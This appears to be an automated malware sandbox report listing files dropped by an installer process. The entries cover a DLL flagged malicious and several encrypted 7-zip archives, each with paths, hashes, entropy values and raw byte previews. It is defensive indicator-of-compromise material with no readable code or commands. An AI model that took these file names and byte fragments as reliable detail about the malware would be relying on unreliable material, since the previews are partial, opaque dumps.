                          Preview:.@S.....Hi>...................=..4.8.%W.$<..<.A!x.b...o..2.\....a..V.$3...NY..).......*..e.^S..o.v.}...q....[.....0<>YD....fI.A/.H...... .u..>.~.Pe.h.^.r..........I.0(....{u.Q....g...../(._g.Un....Wl5..WGM=?@...>..1H..<.....R.........e2.F .X....'..b.........H..Ws.....Q..../..t?b.O.'0+.I..k<..&Q.fT.Q\.......(.....Z.`.P.o>V ...1..R...?&Y...p......eX..."d.<T......-d..`...2..n.W.7....N4.........?..m:.J#o...*TJ5<oE..y..i.C....;x.(.a$.|I....m..4.d.J..c.y..O*....r..Q.M..O62,..i....e.......71.`..h.U..{.5...WcYf.>.3p..v......#+`..-....%....+..!CQ9.w..h.F.u..|V;...&{..qb.K.b.E..{..",1z..b.....w............v.4..#.M..(r......T.AB.).P,....eX.e..Q..d....v..U.....8.p..s..&....|.......i....H0.:+.6/.....$RTl...?....[KA.g..j.s..1`...{.5^h^r1.ba...$EZ5...zv:S#.J...2.....0.dh=...Y|=tI.`........d......?E...x.O..k@V.7q.Z....*3W.....g;'..VP.'..g.$..:j..(....x.l.....i...b0....zsIT.$.^A.B...(...<....q.y....p.?$.......r\.........(...Z...].g8....."H..i.i..

                          C:\Program Files (x86)\Windows NT\hrsw.vbc

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606528
                          Entropy (8bit):7.005604268954487
                          Encrypted:false
                          SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                          MD5:1047AF726D2E233D71934EF55E635C4A
                          SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                          SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                          SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 16%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\is-140D4.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1991296
                          Entropy (8bit):7.999905359856555
                          Encrypted:true
                          SSDEEP:49152:lCxGJwolu3n/E3sZoXRUrXJ6di0cLXchbke51ul:lCJol2c3YeoXJ6dFcLsH1ul
                          MD5:3A3CBB8509F127F9B690DB6D717EFE0B
                          SHA1:75622A50925038691E199C7A7EE95AEF614E4256
                          SHA-256:FDF35E1926622C8577D26B56F52DA00E5791F9098E0E9D45D55FAB26FABEEB60
                          SHA-512:6C37A9339625CE7F92C1E2759E4A3F439C9A637781179F669591E5FF4BA5AE21FE6631ABD27D861BF6659044FD146F8FEC7CE0E936C2C9F222BB51DE8E943650
                          Malicious:false
                          Preview:.@S.....Hi>...................=..4.8.%W.$<..<.A!x.b...o..2.\....a..V.$3...NY..).......*..e.^S..o.v.}...q....[.....0<>YD....fI.A/.H...... .u..>.~.Pe.h.^.r..........I.0(....{u.Q....g...../(._g.Un....Wl5..WGM=?@...>..1H..<.....R.........e2.F .X....'..b.........H..Ws.....Q..../..t?b.O.'0+.I..k<..&Q.fT.Q\.......(.....Z.`.P.o>V ...1..R...?&Y...p......eX..."d.<T......-d..`...2..n.W.7....N4.........?..m:.J#o...*TJ5<oE..y..i.C....;x.(.a$.|I....m..4.d.J..c.y..O*....r..Q.M..O62,..i....e.......71.`..h.U..{.5...WcYf.>.3p..v......#+`..-....%....+..!CQ9.w..h.F.u..|V;...&{..qb.K.b.E..{..",1z..b.....w............v.4..#.M..(r......T.AB.).P,....eX.e..Q..d....v..U.....8.p..s..&....|.......i....H0.:+.6/.....$RTl...?....[KA.g..j.s..1`...{.5^h^r1.ba...$EZ5...zv:S#.J...2.....0.dh=...Y|=tI.`........d......?E...x.O..k@V.7q.Z....*3W.....g;'..VP.'..g.$..:j..(....x.l.....i...b0....zsIT.$.^A.B...(...<....q.y....p.?$.......r\.........(...Z...].g8....."H..i.i..

                          C:\Program Files (x86)\Windows NT\is-HUCSR.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1741188
                          Entropy (8bit):7.9999001471583515
                          Encrypted:true
                          SSDEEP:49152:9aEhXvns3rFhdXUq1lMApKE59iYLfn1jtTO/W2Y7u4NC:bXvsbGqXMUKE59i2rSMu4NC
                          MD5:094C0AE003065FFA5629135986100DE9
                          SHA1:4E69EB9649E29070C6F9229663E20E6895EE3635
                          SHA-256:4E32486F96073839E9E674B2C372B58BC4244EAF45994E50D46BF94A3BF6B5ED
                          SHA-512:2C952EB9CFC46F4DF1A4F7E36B372C15B5361513805739E5424095C74AE6C4E1DFC0160505E1CBDFCDA73391E51ED40BC26E2BAE3E7C4CF87EA40DCF2C60F984
                          Malicious:false
                          Preview:.#........J..#..Q.JQ;...}....S..U?.S.Z.qcL.XY:#w..).R.I..Dx....r....2. .T.....iC.:.2..+^..t...tc.......8p&....|...y*c....M..q..e1Xk.4...x..F.n.F....e0....ow.......P.I@.r..'7..Fh%..E.b.....<...iw6Z.......YvY...~YT..`.2rgl.......2..7.,.guV..............c#2....W.Z.....E.$....j......m...d..#.Xq.-J..Q.v.{.q...J'G....#<(.cc=hA.2.6iy.-8N.....(.!..zd..YQ......j-^..e..*X!..5..f.M,..j..&G......q...*......3.#.xQ.3.(.{..2..n.....g../..T5q......f.........3My4......I.......2.......#k...yg.....).2y........:..)!9K..NB..?.&..b.k...N...xc.K..T....3.K.;.\...../(7.r....>.g.....w."...R..>.;8@:....0lK7>.&1p./.?b}.;._b..|[.TC...UO.W...br.Kp....6m.B...$NOL.......R7r..&/d..^.:......o.f...?@.@....t^e...@.4.I)...)-.y.K.Y....2..~...>..d.<.....n....\l|..H.d3t...L?"..l... ..>....wc....T.......L7.....j.......l...K......,yB ......N.......L_...Z.at..O</..X.~...E..y...q~G....1..=.rwR....Y.......(3m..>.R~F.U....J.w.....L.Jx|.b.....l.B.'A&....z.X..K.T.G...{9..i...e.

                          C:\Program Files (x86)\Windows NT\locale.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996643243558829
                          Encrypted:true
                          SSDEEP:1536:OB96vjwLrnk4oI1zr06mcoXXcLrmSYmmlTaZAB2awGqw:cUb4rkk5I6YcBYmmzBfh
                          MD5:499F183D11BB9D100ECBF7FD156C56AE
                          SHA1:A49086BAB8E06B37BB2729663F8D5BB2C4D89A9B
                          SHA-256:3025E8E51DBA5D77D4DBBE7A1EDBFDE9A19C60306B712895E7F18963982CDB43
                          SHA-512:7E2F46DE855C67CAA606DB1000F0FEA4EEAE55620E34B48BA9076245A686496648F8279C511412C70E08E9CC2C3AD3F8B5853F2EDFA897647993438FA1E11056
                          Malicious:false
                          Preview:.@S......6.l ..............Q*..}."...|..P{....;X..gi......k..l...MPD.D..=...T..w..6vH.8....7.^.......d.?.D.(.).a.-U...&..w.$....o..'.D:^.Q9....t.t.v=..[.PO..'A..0zW...n%.Aye{...tUY.....5.`-.)......\.h.1.^...:...$....N...O.ot.s.._.bPi.w...qZ.q....t|^<.....%..wR.....y.........)ad5.sG.?.%.9..Cg..xLx...d..;.6.o...w.c......@L.].6..I....;..4.8(ZM.5..c.u.)`d...?^F.1.....(Hj.IM...J...~...."......B09.2@..^._.k<.S.V..Sx'..,..:.O.`.].+99..R..`......by.\.e...q..<..ScF.a.q.7..X%...U.............b.F?...........e"{......^...c......Z.....r.zO@~. .!Rg.[@...%.*&...s.+.b..{..I.k,n......r....H...]D..[..n....'...e.=.o....`+..m3...*trP.2..Q8e0.{...V...!?WZ.2.oU.q....9..;......>@...$".^..^...<.0EU..H...;E.CBJ]c~A..{.C..~R|27...{.?LW..q:...=....SU%r.`}.u..........RV_.B,.L..[....h.d..:..h._6...d.t.U<.e..S...^.A.Y.`..{..DY..ZE.n +m*e.M..m<.O1r.-.sd.".....*=5v./v.!...]...P5$R.r....[... .W...U ./.,{r.5h.^...o.>.M.E4...D...!s.N...$..<..N..v.!......6..Cq..07Q

                          C:\Program Files (x86)\Windows NT\locale.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996643243558827
                          Encrypted:true
                          SSDEEP:768:dOgF0xeYTrPzC17HiuO90X3o5NyGBZvDvTCDRA63/UYK6LR79DUrFQ+W3IOpmsCA:dOgATuHCNyGBoDmA/iaJUZilTeZ0cM
                          MD5:9879CBB6CD59F92E48BCABAABEA1F242
                          SHA1:236E0679940B8328256717B86B499265A30B6F14
                          SHA-256:F55074BCCC64EA17CDF518D06B57BBF5E67D4A12632B91F9798E5DD4084AFFC4
                          SHA-512:5DC8902DAB75025AFB57F322BCD142E4989C61B3C07A60689C7616E84F0237A825975EA4D3E8C8A3DD939363A9B4E5DB30368CC975DBE39C1888C66ED57DBC15
                          Malicious:false
                          Preview:7z..'...ho..........2..............w.b.sz..(J.@...&...b+6kPx..3.=d....k. 5...C.'JE..7..f.21.2i..C.N.n|.....{.Z...(..j}...t...M.m.A..`..B..j-.....Q....5..8&..6..2%...Q....*.....)`P6.J.t....!/.a:R>........c2.=V...@o..]A.g..m...)...%......}....aY......X<Y.KZ..M..0v...u.uoY.O3....N.2.R.>;.......2/).mY....x;&~.5t.3..j.".."E.\.Cp.,.] .|?.i...X.Wm.......2Y!I......n."..]..Io....._.W/...Z.W.gi.....9.9l.(D..U....~v&f...e%A.)\t.e...o.(....1.y1...[)}(...9.+_.u ....V.UO......k.~...cAG..5nw.qk#)....I..^G..v..P1Jv.w.'RX..mh(.^.a..f.>..X.S.W....5'2......D.j...M.. h...L..VQ/.6r....:.r......bViF.D$....'...p...x...O<....)............}S:.....Qr.......MG,...|...A.......3q6.....{......-.D...k.F......y.....r3W..........;.9......zFI.....A..Z.z._T.4...]..*.LJ}a.>.B.U...!....FC.4=...._.d,.,U..0...cp.+.q..5....zxi.c..M.m~.qg...E.X................|..[...~ .......o.=;......._.K.IFn+..f......g.......i.z..#\...H...Z..{6$.X...E..t.)x#._,.$.|Gw.R.e.. ...i...

                          C:\Program Files (x86)\Windows NT\locale2.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255975
                          Encrypted:true
                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                          Malicious:false
                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                          C:\Program Files (x86)\Windows NT\locale2.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255979
                          Encrypted:true
                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                          MD5:4CB8B7E557C80FC7B014133AB834A042
                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                          Malicious:false
                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                          C:\Program Files (x86)\Windows NT\locale3.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                          MD5:8622FC7228777F64A47BD6C61478ADD9
                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                          Malicious:false
                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                          C:\Program Files (x86)\Windows NT\locale3.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                          Malicious:false
                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                          C:\Program Files (x86)\Windows NT\locale4.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.99759370165655
                          Encrypted:true
                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                          MD5:950338D50B95A25F494EE74E97B7B7A9
                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                          Malicious:false
                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                          C:\Program Files (x86)\Windows NT\locale4.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.997593701656546
                          Encrypted:true
                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                          Malicious:false
                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                          C:\Program Files (x86)\Windows NT\locale7.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653607
                          Encrypted:true
                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                          Malicious:false
                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                          C:\Program Files (x86)\Windows NT\locale7.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653608
                          Encrypted:true
                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                          Malicious:false
                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                          C:\Program Files (x86)\Windows NT\res.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):1991296
                          Entropy (8bit):7.999905359856561
                          Encrypted:true
                          SSDEEP:49152:ynmSM3y/RF7EiDKCrZrs9JiM6VCbNbaWWdQsR1moZ3UXCQw:ymRi51EiXtrMJiNiOWWjbbQw
                          MD5:D16EBCD4863229D2C0541C8BF7D701D0
                          SHA1:BB5516ABE88F0236482026FD4C116405CACB1E06
                          SHA-256:2D6C81ED60C4F07B8928FAE1B30A299D9EBA2D0924D06CC0EF6DAF0177549E84
                          SHA-512:959B5906B2EC7D01ACF1224B11C45724FB17A8763FEB6A745E9D8FC04FEBBFBB87AE8E1C3D2E892C9DDFB7160E9D1DC423EDEBA88E19F3A162B0EF5F79C4A78E
                          Malicious:false
